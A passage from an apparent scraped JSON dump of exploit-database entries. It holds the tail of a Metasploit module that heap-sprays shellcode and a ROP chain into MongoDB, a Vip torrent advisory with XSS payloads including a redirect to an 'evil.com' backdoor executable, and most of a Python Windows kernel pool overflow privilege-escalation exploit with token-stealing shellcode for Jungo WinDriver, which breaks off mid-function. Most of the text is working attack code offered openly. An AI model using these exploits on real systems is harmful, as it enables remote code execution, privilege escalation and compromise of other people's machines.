Rex::Text.to_hex([my_target['gadget4']].pack(\"V\"))\r\n gadget5 = Rex::Text.to_hex([my_target['gadget5']].pack(\"V\"))\r\n\r\n shellcode_var=\"a\"+Rex::Text.rand_text_hex(4)\r\n sizechunk_var=\"b\"+Rex::Text.rand_text_hex(4)\r\n chunk_var=\"c\"+Rex::Text.rand_text_hex(4)\r\n i_var=\"d\"+Rex::Text.rand_text_hex(4)\r\n array_var=\"e\"+Rex::Text.rand_text_hex(4)\r\n\r\n ropchain_var=\"f\"+Rex::Text.rand_text_hex(4)\r\n chunk2_var=\"g\"+Rex::Text.rand_text_hex(4)\r\n array2_var=\"h\"+Rex::Text.rand_text_hex(4)\r\n\r\n # nopsled + shellcode heapspray\r\n payload_js = shellcode_var+'=unescape(\"'+shellcode+'\");'\r\n payload_js << sizechunk_var+'=0x1000;'\r\n payload_js << chunk_var+'=\"\";'\r\n payload_js << 'for('+i_var+'=0;'+i_var+'<'+sizechunk_var+';'+i_var+'++){ '+chunk_var+'+=unescape(\"%u9090%u9090\"); } '\r\n payload_js << chunk_var+'='+chunk_var+'.substring(0,('+sizechunk_var+'-'+shellcode_var+'.length));'\r\n payload_js << array_var+'=new Array();'\r\n payload_js << 'for('+i_var+'=0;'+i_var+'<25000;'+i_var+'++){ '+array_var+'['+i_var+']='+chunk_var+'+'+shellcode_var+'; } '\r\n\r\n # retchain + ropchain heapspray\r\n payload_js << ropchain_var+'=unescape(\"'+Rex::Text.to_unescape(mmap)+'\");'\r\n payload_js << chunk2_var+'=\"\";'\r\n payload_js << 'for('+i_var+'=0;'+i_var+'<'+sizechunk_var+';'+i_var+'++){ '+chunk2_var+'+=unescape(\"'+Rex::Text.to_unescape(ret)+'\"); } '\r\n payload_js << chunk2_var+'='+chunk2_var+'.substring(0,('+sizechunk_var+'-'+ropchain_var+'.length));'\r\n payload_js << array2_var+'=new Array();'\r\n payload_js << 'for('+i_var+'=0;'+i_var+'<25000;'+i_var+'++){ '+array2_var+'['+i_var+']='+chunk2_var+'+'+ropchain_var+'; } '\r\n\r\n # Trigger and first ropchain\r\n payload_js << 'nativeHelper.apply({\"x\" : '+gadget1+'}, '\r\n payload_js << '[\"A\"+\"'+gadget3+'\"+\"'+Rex::Text.rand_text_hex(12)+'\"+\"'+gadget2+'\"+\"'+Rex::Text.rand_text_hex(28)+'\"+\"'+gadget4+'\"+\"\\\\x20\\\\x20\\\\x20\\\\x20\"+\"'+gadget5+'\"]);'\r\n\r\n request_id = Rex::Text.rand_text(4)\r\n\r\n packet = request_id #requestID\r\n packet << \"\\xff\\xff\\xff\\xff\" #responseTo\r\n packet << \"\\xd4\\x07\\x00\\x00\" #opCode (2004 OP_QUERY)\r\n packet << \"\\x00\\x00\\x00\\x00\" #flags\r\n packet << datastore['DB']+\".\"+collection+\"\\x00\" #fullCollectionName (db.collection)\r\n packet << \"\\x00\\x00\\x00\\x00\" #numberToSkip (0)\r\n packet << \"\\x01\\x00\\x00\\x00\" #numberToReturn (1)\r\n\r\n where = \"\\x02\\x24\\x77\\x68\\x65\\x72\\x65\\x00\"\r\n where << [payload_js.length+4].pack(\"L\")\r\n where << payload_js+\"\\x00\"\r\n\r\n where.insert(0, [where.length + 4].pack(\"L\"))\r\n\r\n packet += where\r\n packet.insert(0, [packet.length + 4].pack(\"L\"))\r\n\r\n sock.put(packet)\r\n\r\n disconnect\r\n rescue ::Exception => e\r\n fail_with(Exploit::Failure::Unreachable, \"Unable to connect\")\r\n end\r\n end\r\n\r\n def require_auth?\r\n request_id = Rex::Text.rand_text(4)\r\n packet = \"\\x3f\\x00\\x00\\x00\" #messageLength (63)\r\n packet << request_id #requestID\r\n packet << \"\\xff\\xff\\xff\\xff\" #responseTo\r\n packet << \"\\xd4\\x07\\x00\\x00\" #opCode (2004 OP_QUERY)\r\n packet << \"\\x00\\x00\\x00\\x00\" #flags\r\n packet << \"\\x61\\x64\\x6d\\x69\\x6e\\x2e\\x24\\x63\\x6d\\x64\\x00\" #fullCollectionName (admin.$cmd)\r\n packet << \"\\x00\\x00\\x00\\x00\" #numberToSkip (0)\r\n packet << \"\\x01\\x00\\x00\\x00\" #numberToReturn (1)\r\n #query ({\"listDatabases\"=>1})\r\n packet << \"\\x18\\x00\\x00\\x00\\x10\\x6c\\x69\\x73\\x74\\x44\\x61\\x74\\x61\\x62\\x61\\x73\\x65\\x73\\x00\\x01\\x00\\x00\\x00\\x00\"\r\n\r\n sock.put(packet)\r\n response = sock.get_once\r\n\r\n have_auth_error?(response)\r\n end\r\n\r\n def read_only?(collection)\r\n request_id = Rex::Text.rand_text(4)\r\n _id = \"\\x07_id\\x00\"+Rex::Text.rand_text(12)+\"\\x02\"\r\n key = Rex::Text.rand_text(4, nil, 'abcdefghijklmnopqrstuvwxyz')+\"\\x00\"\r\n value = Rex::Text.rand_text(4, nil, 'abcdefghijklmnopqrstuvwxyz')+\"\\x00\"\r\n\r\n insert = _id+key+[value.length].pack(\"L\")+value+\"\\x00\"\r\n\r\n packet = [insert.length+24+datastore['DB'].length+6].pack(\"L\") #messageLength\r\n packet << request_id #requestID\r\n packet << \"\\xff\\xff\\xff\\xff\" #responseTo\r\n packet << \"\\xd2\\x07\\x00\\x00\" #opCode (2002 Insert Document)\r\n packet << \"\\x00\\x00\\x00\\x00\" #flags\r\n packet << datastore['DB'] + \".\" + collection + \"\\x00\" #fullCollectionName (DB.collection)\r\n packet << [insert.length+4].pack(\"L\")\r\n packet << insert\r\n\r\n sock.put(packet)\r\n\r\n request_id = Rex::Text.rand_text(4)\r\n\r\n packet = [datastore['DB'].length + 61].pack(\"L\") #messageLength (66)\r\n packet << request_id #requestID\r\n packet << \"\\xff\\xff\\xff\\xff\" #responseTo\r\n packet << \"\\xd4\\x07\\x00\\x00\" #opCode (2004 Query)\r\n packet << \"\\x00\\x00\\x00\\x00\" #flags\r\n packet << datastore['DB'] + \".$cmd\" + \"\\x00\" #fullCollectionName (DB.$cmd)\r\n packet << \"\\x00\\x00\\x00\\x00\" #numberToSkip (0)\r\n packet << \"\\xff\\xff\\xff\\xff\" #numberToReturn (1)\r\n packet << \"\\x1b\\x00\\x00\\x00\"\r\n packet << \"\\x01\\x67\\x65\\x74\\x6c\\x61\\x73\\x74\\x65\\x72\\x72\\x6f\\x72\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xf0\\x3f\\x00\"\r\n\r\n sock.put(packet)\r\n\r\n response = sock.get_once\r\n have_auth_error?(response)\r\n end\r\n\r\n def do_login\r\n print_status(\"Trying #{datastore['USERNAME']}/#{datastore['PASSWORD']} on #{datastore['DB']} database\")\r\n nonce = get_nonce\r\n status = auth(nonce)\r\n return status\r\n end\r\n\r\n def auth(nonce)\r\n request_id = Rex::Text.rand_text(4)\r\n packet = request_id #requestID\r\n packet << \"\\xff\\xff\\xff\\xff\" #responseTo\r\n packet << \"\\xd4\\x07\\x00\\x00\" #opCode (2004 OP_QUERY)\r\n packet << \"\\x00\\x00\\x00\\x00\" #flags\r\n packet << datastore['DB'] + \".$cmd\" + \"\\x00\" #fullCollectionName (DB.$cmd)\r\n packet << \"\\x00\\x00\\x00\\x00\" #numberToSkip (0)\r\n packet << \"\\xff\\xff\\xff\\xff\" #numberToReturn (1)\r\n\r\n #{\"authenticate\"=>1.0, \"user\"=>\"root\", \"nonce\"=>\"94e963f5b7c35146\", \"key\"=>\"61829b88ee2f8b95ce789214d1d4f175\"}\r\n document = \"\\x01\\x61\\x75\\x74\\x68\\x65\\x6e\\x74\\x69\\x63\\x61\\x74\\x65\"\r\n document << \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xf0\\x3f\\x02\\x75\\x73\\x65\\x72\\x00\"\r\n document << [datastore['USERNAME'].length + 1].pack(\"L\") # +1 due null byte termination\r\n document << datastore['USERNAME'] + \"\\x00\"\r\n document << \"\\x02\\x6e\\x6f\\x6e\\x63\\x65\\x00\\x11\\x00\\x00\\x00\"\r\n document << nonce + \"\\x00\"\r\n document << \"\\x02\\x6b\\x65\\x79\\x00\\x21\\x00\\x00\\x00\"\r\n document << Rex::Text.md5(nonce + datastore['USERNAME'] + Rex::Text.md5(datastore['USERNAME'] + \":mongo:\" + datastore['PASSWORD'])) + \"\\x00\"\r\n document << \"\\x00\"\r\n #Calculate document length\r\n document.insert(0, [document.length + 4].pack(\"L\"))\r\n\r\n packet += document\r\n\r\n #Calculate messageLength\r\n packet.insert(0, [(packet.length + 4)].pack(\"L\")) #messageLength\r\n sock.put(packet)\r\n response = sock.get_once\r\n if have_auth_error?(response)\r\n print_error(\"Bad login or DB\")\r\n return 0\r\n else\r\n print_good(\"Successful login on DB #{datastore['db']}\")\r\n return 1\r\n end\r\n\r\n\r\n end\r\n\r\n def get_nonce\r\n request_id = Rex::Text.rand_text(4)\r\n packet = [datastore['DB'].length + 57].pack(\"L\") #messageLength (57+DB.length)\r\n packet << request_id #requestID\r\n packet << \"\\xff\\xff\\xff\\xff\" #responseTo\r\n packet << \"\\xd4\\x07\\x00\\x00\" #opCode (2004 OP_QUERY)\r\n packet << \"\\x00\\x00\\x00\\x00\" #flags\r\n packet << datastore['DB'] + \".$cmd\" + \"\\x00\" #fullCollectionName (DB.$cmd)\r\n packet << \"\\x00\\x00\\x00\\x00\" #numberToSkip (0)\r\n packet << \"\\x01\\x00\\x00\\x00\" #numberToReturn (1)\r\n #query {\"getnonce\"=>1.0}\r\n packet << \"\\x17\\x00\\x00\\x00\\x01\\x67\\x65\\x74\\x6e\\x6f\\x6e\\x63\\x65\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xf0\\x3f\\x00\"\r\n\r\n sock.put(packet)\r\n response = sock.get_once\r\n documents = response[36..1024]\r\n #{\"nonce\"=>\"f785bb0ea5edb3ff\", \"ok\"=>1.0}\r\n nonce = documents[15..30]\r\n end\r\n\r\n def have_auth_error?(response)\r\n #Response header 36 bytes long\r\n documents = response[36..1024]\r\n #{\"errmsg\"=>\"auth fails\", \"ok\"=>0.0}\r\n #{\"errmsg\"=>\"need to login\", \"ok\"=>0.0}\r\n if documents.include?('errmsg') || documents.include?('unauthorized')\r\n return true\r\n else\r\n return false\r\n end\r\n end\r\nend\n\n# 0day.today [2018-04-12] #", "cvss": {"score": 6.0, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/20597"}, {"lastseen": "2018-04-08T22:53:28", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category local exploits", "modified": "2012-09-17T00:00:00", "published": "2012-09-17T00:00:00", "id": "1337DAY-ID-19417", "href": "https://0day.today/exploit/description/19417", "type": "zdt", "title": "Vip torrent 4.X.X - Multiple Vulnerabilities", "sourceData": "#!/usr/bin/perl\r\n# 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0\r\n# 0 _ __ __ __ 1\r\n# 1 /' \\ __ /'__`\\ /\\ \\__ /'__`\\ 0\r\n# 0 /\\_, \\ ___ /\\_\\/\\_\\ \\ \\ ___\\ \\ ,_\\/\\ \\/\\ \\ _ ___ 1\r\n# 1 \\/_/\\ \\ /' _ `\\ \\/\\ \\/_/_\\_<_ /'___\\ \\ \\/\\ \\ \\ \\ \\/\\`'__\\ 0\r\n# 0 \\ \\ \\/\\ \\/\\ \\ \\ \\ \\/\\ \\ \\ \\/\\ \\__/\\ \\ \\_\\ \\ \\_\\ \\ \\ \\/ 1\r\n# 1 \\ \\_\\ \\_\\ \\_\\_\\ \\ \\ \\____/\\ \\____\\\\ \\__\\\\ \\____/\\ \\_\\ 0\r\n# 0 \\/_/\\/_/\\/_/\\ \\_\\ \\/___/ \\/____/ \\/__/ \\/___/ \\/_/ 1\r\n# 1 \\ \\____/ >> Exploit database separated by exploit 0\r\n# 0 \\/___/ type (local, remote, DoS, etc.) 1\r\n# 1 1\r\n# 0 [x] Official Website: http://www.1337day.com 0\r\n# 1 [x] Support E-mail : mr.inj3ct0r[at]gmail[dot]com 1\r\n# 0 0\r\n# 1 ========================================== 1\r\n# 0 I'm Dark-Puzzle From Inj3ct0r TEAM 0\r\n# 0 1\r\n# 1 dark-puzzle[at]live[at]fr 0\r\n# 0 ========================================== 1\r\n# 1 White Hat 1\r\n# 0 Independant Pentester 0\r\n# 1 exploit coder/bug researcher 0\r\n# 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1\r\n# Title: Vip torrent 4.X.X - Multiple Vulnerabilities .\r\n# Author : Dark-Puzzle (Souhail Hammou) .\r\n# Date : 19/09/2012 .\r\n# Risk : High\r\n# Type : Local .\r\n# Versions : 4.X.X .\r\n# Tested On : WinXP SP2 FR / Win 7 64bits .\r\n# Gr33tz to : 1nj3ct0r's Team - Exploit-db - Packetstormsecurity - SecurityFocus .\r\n########################################################\r\n# I - JavaScript Code Execution .\r\n########################################################\r\n# The search bar designed for torrent is vulnerable to javascript Code execution . .\r\n# Reason = Using IE . ( Some Remote/Local IE Exploits May Work ) --> FlashObj Exploit Worked with me On IE8 Under Win7 .\r\n# This execution can be executed on a local way or on a remote way .\r\n### go to the search bar : <script> alert(window.location) </script>\r\n###\t\t\t\t\t\t <script> print ('OWn3d') </script> This command uses the printer =) .\r\n###\t\t\t\t\t\t <script> window.location=\"http://www.evil.com/backdoor.exe\" </script>\r\n###\t\t\t\t\t\t <script> alert ('Own3d') </script>\r\n###\t\t\t\t\t\t\t...etc\r\n\r\n########################################################\r\n# II - Memory Exhaustion Vulnerability \r\n########################################################\r\n# Info : VIP Torrent is prone to a Memory Exhaustion Vulnerability that leads to the raising of CPU Usage to 100% . \r\n# P.S(Overclocked Processor may face some serious problem with this) .\r\n# Usage : perl mem.pl\r\n# Copy the content of mem.txt . Go to File --> Open --> Torrent File --> Add Url --> Then Paste What you copied.\r\nmy $http = \"\\x68\\x74\\x74\\x70\\x3A\\x2F\\x2F\" ;\r\nmy $mem = \"\\x41\" x 25000 ;\r\n$load= $http.$mem;\r\nopen(myfile,'>mem.txt');\r\nprint myfile $payload;\r\nclose(myfile);\r\nprint \"\\x45\\x78\\x70\\x6C\\x6F\\x69\\x74\\x20\\x42\\x79\\x20\\x44\\x61\\x72\\x6B\\x2D\\x50\\x75\\x7A\\x7A\\x6C\\x65\\n\";\r\nsleep (3);\r\nprint \"File Created Successfuly\\n\";\r\n\r\n\n\n# 0day.today [2018-04-08] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/19417"}], "packetstorm": [{"lastseen": "2017-09-08T05:08:41", "bulletinFamily": "exploit", "description": "", "modified": "2017-09-07T00:00:00", "published": "2017-09-07T00:00:00", "href": "https://packetstormsecurity.com/files/144046/Jungo-DriverWizard-WinDrive-Overflow.html", "id": "PACKETSTORM:144046", "title": "Jungo DriverWizard WinDrive Overflow", "type": "packetstorm", "sourceData": "`# -*- coding: utf-8 -*- \n\"\"\" \nJungo DriverWizard WinDriver Kernel Pool Overflow Vulnerability \n \nDownload: http://www.jungo.com/st/products/windriver/ \nFile: WD1240.EXE \nSha1: 3527cc974ec885166f0d96f6aedc8e542bb66cba \nDriver: windrvr1240.sys \nSha1: 0f212075d86ef7e859c1941f8e5b9e7a6f2558ad \nCVE: CVE-2017-14153 \nAuthor: Steven Seeley (mr_me) of Source Incite \nAffected: <= v12.4.0 \nThanks: b33f, ryujin and sickness \nAnalysis: http://srcincite.io/blog/2017/09/06/sharks-in-the-pool-mixed-object-exploitation-in-the-windows-kernel-pool.html \n \nSummary: \n======== \n \nThis vulnerability allows local attackers to escalate privileges on vulnerable installations of Jungo WinDriver. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. \n \nThe specific flaw exists within the processing of IOCTL 0x953824b7 by the windrvr1240 kernel driver. The issue lies in the failure to properly validate user-supplied data which can result in a kernel pool overflow. An attacker can leverage this vulnerability to execute arbitrary code under the context of kernel. \n \nTimeline: \n========= \n \n2017-08-22 a Verified and sent to Jungo via sales@/first@/security@/info@jungo.com \n2017-08-25 a No response from Jungo and two bounced emails \n2017-08-26 a Attempted a follow up with the vendor via website chat \n2017-08-26 a No response via the website chat \n2017-09-03 a Recieved an email from a Jungo representative stating that they are \"looking into it\" \n2017-09-03 a Requested a timeframe for patch development and warned of possible 0day release \n2017-09-06 a No response from Jungo \n2017-09-06 a Public 0day release of advisory \n \nExample: \n======== \n \nC:\\Users\\Guest\\Desktop>icacls poc.py \npoc.py NT AUTHORITY\\Authenticated Users:(I)(F) \nNT AUTHORITY\\SYSTEM:(I)(F) \nBUILTIN\\Administrators:(I)(F) \nBUILTIN\\Users:(I)(F) \nMandatory Label\\Low Mandatory Level:(I)(NW) \n \nSuccessfully processed 1 files; Failed processing 0 files \n \nC:\\Users\\Guest\\Desktop>whoami \ndebugee\\guest \n \nC:\\Users\\Guest\\Desktop>poc.py \n \n--[ Jungo DriverWizard WinDriver Kernel Pool Overflow EoP exploit ] \nSteven Seeley (mr_me) of Source Incite \n \n(+) spraying pool with mixed objects... \n(+) sprayed the pool! \n(+) making pool holes... \n(+) made the pool holes! \n(+) allocating shellcode... \n(+) allocated the shellcode! \n(+) triggering pool overflow... \n(+) allocating pool overflow input buffer \n(+) elevating privileges! \nMicrosoft Windows [Version 6.1.7601] \nCopyright (c) 2009 Microsoft Corporation. All rights reserved. \n \nC:\\Users\\Guest\\Desktop>whoami \nnt authority\\system \n \nC:\\Users\\Guest\\Desktop> \n\"\"\" \nfrom ctypes import * \nfrom ctypes.wintypes import * \nimport struct, sys, os, time \nfrom platform import release, architecture \n \nntdll = windll.ntdll \nkernel32 = windll.kernel32 \nMEM_COMMIT = 0x00001000 \nMEM_RESERVE = 0x00002000 \nPAGE_EXECUTE_READWRITE = 0x00000040 \nSTATUS_SUCCESS = 0x0 \nSTATUS_INFO_LENGTH_MISMATCH = 0xC0000004 \nSTATUS_INVALID_HANDLE = 0xC0000008 \nSystemExtendedHandleInformation = 64 \n \nclass LSA_UNICODE_STRING(Structure): \n\"\"\"Represent the LSA_UNICODE_STRING on ntdll.\"\"\" \n_fields_ = [ \n(\"Length\", USHORT), \n(\"MaximumLength\", USHORT), \n(\"Buffer\", LPWSTR), \n] \n \nclass SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX(Structure): \n\"\"\"Represent the SYSTEM_HANDLE_TABLE_ENTRY_INFO on ntdll.\"\"\" \n_fields_ = [ \n(\"Object\", c_void_p), \n(\"UniqueProcessId\", ULONG), \n(\"HandleValue\", ULONG), \n(\"GrantedAccess\", ULONG), \n(\"CreatorBackTraceIndex\", USHORT), \n(\"ObjectTypeIndex\", USHORT), \n(\"HandleAttributes\", ULONG), \n(\"Reserved\", ULONG), \n] \n \nclass SYSTEM_HANDLE_INFORMATION_EX(Structure): \n\"\"\"Represent the SYSTEM_HANDLE_INFORMATION on ntdll.\"\"\" \n_fields_ = [ \n(\"NumberOfHandles\", ULONG), \n(\"Reserved\", ULONG), \n(\"Handles\", SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX * 1), \n] \n \nclass PUBLIC_OBJECT_TYPE_INFORMATION(Structure): \n\"\"\"Represent the PUBLIC_OBJECT_TYPE_INFORMATION on ntdll.\"\"\" \n_fields_ = [ \n(\"Name\", LSA_UNICODE_STRING), \n(\"Reserved\", ULONG * 22), \n] \n \nclass PROCESSENTRY32(Structure): \n_fields_ = [ \n(\"dwSize\", c_ulong), \n(\"cntUsage\", c_ulong), \n(\"th32ProcessID\", c_ulong), \n(\"th32DefaultHeapID\", c_int), \n(\"th32ModuleID\", c_ulong), \n(\"cntThreads\", c_ulong), \n(\"th32ParentProcessID\", c_ulong), \n(\"pcPriClassBase\", c_long), \n(\"dwFlags\", c_ulong), \n(\"szExeFile\", c_wchar * MAX_PATH) \n] \n \nProcess32First = kernel32.Process32FirstW \nProcess32Next = kernel32.Process32NextW \n \ndef signed_to_unsigned(signed): \n\"\"\" \nConvert signed to unsigned integer. \n\"\"\" \nunsigned, = struct.unpack (\"L\", struct.pack (\"l\", signed)) \nreturn unsigned \n \ndef get_type_info(handle): \n\"\"\" \nGet the handle type information to find our sprayed objects. \n\"\"\" \npublic_object_type_information = PUBLIC_OBJECT_TYPE_INFORMATION() \nsize = DWORD(sizeof(public_object_type_information)) \nwhile True: \nresult = signed_to_unsigned( \nntdll.NtQueryObject( \nhandle, 2, byref(public_object_type_information), size, None)) \nif result == STATUS_SUCCESS: \nreturn public_object_type_information.Name.Buffer \nelif result == STATUS_INFO_LENGTH_MISMATCH: \nsize = DWORD(size.value * 4) \nresize(public_object_type_information, size.value) \nelif result == STATUS_INVALID_HANDLE: \nreturn None \nelse: \nraise x_file_handles(\"NtQueryObject.2\", hex (result)) \n \ndef get_handles(): \n\"\"\" \nReturn all the processes handles in the system at the time. \nCan be done from LI (Low Integrity) level on Windows 7 x86. \n\"\"\" \nsystem_handle_information = SYSTEM_HANDLE_INFORMATION_EX() \nsize = DWORD (sizeof (system_handle_information)) \nwhile True: \nresult = ntdll.NtQuerySystemInformation( \nSystemExtendedHandleInformation, \nbyref(system_handle_information), \nsize, \nbyref(size) \n) \nresult = signed_to_unsigned(result) \nif result == STATUS_SUCCESS: \nbreak \nelif result == STATUS_INFO_LENGTH_MISMATCH: \nsize = DWORD(size.value * 4) \nresize(system_handle_information, size.value) \nelse: \nraise x_file_handles(\"NtQuerySystemInformation\", hex(result)) \n \npHandles = cast( \nsystem_handle_information.Handles, \nPOINTER(SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX * \\ \nsystem_handle_information.NumberOfHandles) \n) \nfor handle in pHandles.contents: \nyield handle.UniqueProcessId, handle.HandleValue, handle.Object \n \ndef we_can_alloc_shellcode(): \n\"\"\" \nThis function allocates the shellcode @ the null page making \nsure the new OkayToCloseProcedure pointer points to shellcode. \n\"\"\" \nbaseadd = c_int(0x00000004) \nnull_size = c_int(0x1000) \n \ntokenstealing = ( \n\"\\x33\\xC0\\x64\\x8B\\x80\\x24\\x01\\x00\\x00\\x8B\\x40\\x50\\x8B\\xC8\\x8B\\x80\" \n\"\\xB8\\x00\\x00\\x00\\x2D\\xB8\\x00\\x00\\x00\\x83\\xB8\\xB4\\x00\\x00\\x00\\x04\" \n\"\\x75\\xEC\\x8B\\x90\\xF8\\x00\\x00\\x00\\x89\\x91\\xF8\\x00\\x00\\x00\\xC2\\x10\" \n\"\\x00\" ) \n \nOkayToCloseProcedure = struct.pack(\"<L\", 0x00000078) \nsc = \"\\x42\" * 0x70 + OkayToCloseProcedure \n \n# first we restore our smashed TypeIndex \nsc += \"\\x83\\xC6\\x0c\" # add esi, 0c \nsc += \"\\xc7\\x06\\x0a\\x00\\x08\\x00\" # mov [esi], 8000a \nsc += \"\\x83\\xee\\x0c\" # sub esi, 0c \nsc += tokenstealing \nsc += \"\\x90\" * (0x400-len(sc)) \nntdll.NtAllocateVirtualMemory.argtypes = [c_int, POINTER(c_int), c_ulong, \nPOINTER(c_int), c_int, c_int] \ndwStatus = ntdll.NtAllocateVirtualMemory(0xffffffff, byref(baseadd), 0x0, \nbyref(null_size), \nMEM_RESERVE|MEM_COMMIT, \nPAGE_EXECUTE_READWRITE) \nif dwStatus != STATUS_SUCCESS: \nprint \"(-) error while allocating the null paged memory: %s\" % dwStatus \nreturn False \nwritten = c_ulong() \nwrite = kernel32.WriteProcessMemory(0xffffffff, 0x00000004, sc, 0x400, byref(written)) \nif write == 0: \nprint \"(-) error while writing our junk to the null paged memory: %s\" % write \nreturn False \nreturn True \n \ndef we_can_spray(): \n\"\"\" \nSpray the Kernel Pool with IoCompletionReserve and Event Objects. \nThe IoCompletionReserve object is 0x60 and Event object is 0x40 bytes in length. \nThese are allocated from the Nonpaged kernel pool. \n\"\"\" \nhandles = [] \nIO_COMPLETION_OBJECT = 1 \nfor i in range(0, 25000): \nhandles.append(windll.kernel32.CreateEventA(0,0,0,0)) \nhHandle = HANDLE(0) \nhandles.append(ntdll.NtAllocateReserveObject(byref(hHandle), 0x0, IO_COMPLETION_OBJECT)) \n \n# could do with some better validation \nif len(handles) > 0: \nreturn True \nreturn False \n \ndef alloc_pool_overflow_buffer(base, input_size): \n\"\"\" \nCraft our special buffer to trigger the overflow. \n\"\"\" \nprint \"(+) allocating pool overflow input buffer\" \nbaseadd = c_int(base) \nsize = c_int(input_size) \ninput = \"\\x41\" * 0x18 # offset to size \ninput += struct.pack(\"<I\", 0x0000008d) # controlled size (this triggers the overflow) \ninput += \"\\x42\" * (0x90-len(input)) # padding to survive bsod \ninput += struct.pack(\"<I\", 0x00000000) # use a NULL dword for sub_4196CA \ninput += \"\\x43\" * ((0x460-0x8)-len(input)) # fill our pool buffer \n \n# repair the allocated chunk header... \ninput += struct.pack(\"<I\", 0x040c008c) # _POOL_HEADER \ninput += struct.pack(\"<I\", 0xef436f49) # _POOL_HEADER (PoolTag) \ninput += struct.pack(\"<I\", 0x00000000) # _OBJECT_HEADER_QUOTA_INFO \ninput += struct.pack(\"<I\", 0x0000005c) # _OBJECT_HEADER_QUOTA_INFO \ninput += struct.pack(\"<I\", 0x00000000) # _OBJECT_HEADER_QUOTA_INFO \ninput += struct.pack(\"<I\", 0x00000000) # _OBJECT_HEADER_QUOTA_INFO \ninput += struct.pack(\"<I\", 0x00000001) # _OBJECT_HEADER (PointerCount) \ninput += struct.pack(\"<I\", 0x00000001) # _OBJECT_HEADER (HandleCount) \ninput += struct.pack(\"<I\", 0x00000000) # _OBJECT_HEADER (Lock) \ninput += struct.pack(\"<I\", 0x00080000) # _OBJECT_HEADER (TypeIndex) \ninput += struct.pack(\"<I\", 0x00000000) # _OBJECT_HEADER (ObjectCreateInfo) \n \n# filler \ninput += \"\\x44\" * (input_size-len(input)) \nntdll.NtAllocateVirtualMemory.argtypes = [c_int, POINTER(c_int), c_ulong, \nPOINTER(c_int), c_int, c_int] \ndwStatus = ntdll.NtAllocateVirtualMemory(0xffffffff, byref(baseadd), 0x0, \nbyref(size), \nMEM_RESERVE|MEM_COMMIT, \nPAGE_EXECUTE_READWRITE) \nif dwStatus != STATUS_SUCCESS: \nprint \"(-) error while allocating memory: %s\" % hex(dwStatus + 0xffffffff) \nreturn False \nwritten = c_ulong() \nwrite = kernel32.WriteProcessMemory(0xffffffff, base, input, len(input), byref(written)) \nif write == 0: \nprint \"(-) error while writing our input buffer memory: %s\" % write \nreturn False \nreturn True \n \ndef we_can_trigger_the_pool_overflow(): \n\"\"\" \nThis triggers the pool overflow vulnerability using a buffer of size 0x460. \n\"\"\" \nGENERIC_READ = 0x80000000 \nGENERIC_WRITE = 0x40000000 \nOPEN_EXISTING = 0x3 \nDEVICE_NAME = \"\\\\\\\\.\\\\WinDrvr1240\" \ndwReturn = c_ulong() \ndriver_handle = kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, None) \ninputbuffer = 0x41414141 \ninputbuffer_size = 0x5000 \noutputbuffer_size = 0x5000 \noutputbuffer = 0x20000000 \nalloc_pool_overflow_buffer(inputbuffer, inputbuffer_size) \nIoStatusBlock = c_ulong() \n \nif driver_handle: \ndev_ioctl = ntdll.ZwDeviceIoControlFile(driver_handle, None, None, None, byref(IoStatusBlock), 0x953824b7, \ninputbuffer, inputbuffer_size, outputbuffer, outputbuffer_size) \nreturn True \nreturn False \n \ndef we_can_make_pool_holes(): \n\"\"\" \nThis makes the pool holes that will coalesce into a hole of size 0x460. \n\"\"\" \nglobal khandlesd \nmypid = os.getpid() \nkhandlesd = {} \nkhandlesl = [] \n \n# leak kernel handles \nfor pid, handle, obj in get_handles(): \n \n# mixed object attack \nif pid == mypid and (get_type_info(handle) == \"Event\" or get_type_info(handle) == \"IoCompletionReserve\"): \nkhandlesd[obj] = handle \nkhandlesl.append(obj) \n \n# Find holes and make our allocation \nholes = [] \nfor obj in khandlesl: \n \n# obj address is the handle address, but we want to allocation \n# address, so we just remove the size of the object header from it. \nalloc = obj - 0x30 \n \n# Get allocations at beginning of the page \nif (alloc & 0xfffff000) == alloc: \nbin = [] \n \n# object sizes \nCreateEvent_size = 0x40 \nIoCompletionReserve_size = 0x60 \ncombined_size = CreateEvent_size + IoCompletionReserve_size \n \n# after the 0x20 chunk hole, the first object will be the IoCompletionReserve object \noffset = IoCompletionReserve_size \nfor i in range(offset, offset + (7 * combined_size), combined_size): \ntry: \n# chunks need to be next to each other for the coalesce to take effect \nbin.append(khandlesd[obj + i]) \nbin.append(khandlesd[obj + i - IoCompletionReserve_size]) \nexcept KeyError: \npass \n \n# make sure it's contiguously allocated memory \nif len(tuple(bin)) == 14: \nholes.append(tuple(bin)) \n \n# make the holes to fill \nfor hole in holes: \nfor handle in hole: \nkernel32.CloseHandle(handle) \nreturn True \n \ndef trigger_lpe(): \n\"\"\" \nThis function frees the IoCompletionReserve objects and this triggers the \nregistered aexit, which is our controlled pointer to OkayToCloseProcedure. \n\"\"\" \n# free the corrupted chunk to trigger OkayToCloseProcedure \nfor k, v in khandlesd.iteritems(): \nkernel32.CloseHandle(v) \nos.system(\"cmd.exe\") \n \ndef main(): \nprint \"\\n\\t--[ Jungo DriverWizard WinDriver Kernel Pool Overflow EoP exploit ]\" \nprint \"\\t Steven Seeley (mr_me) of Source Incite\\r\\n\" \n \nif release() != \"7\" or architecture()[0] != \"32bit\": \nprint \"(-) although this exploit may work on this system,\" \nprint \" it was only designed for Windows 7 x86.\" \nsys.exit(-1) \n \nprint \"(+) spraying pool with mixed objects...\" \nif we_can_spray(): \nprint \"(+) sprayed the pool!\" \nprint \"(+) making pool holes...\" \nif 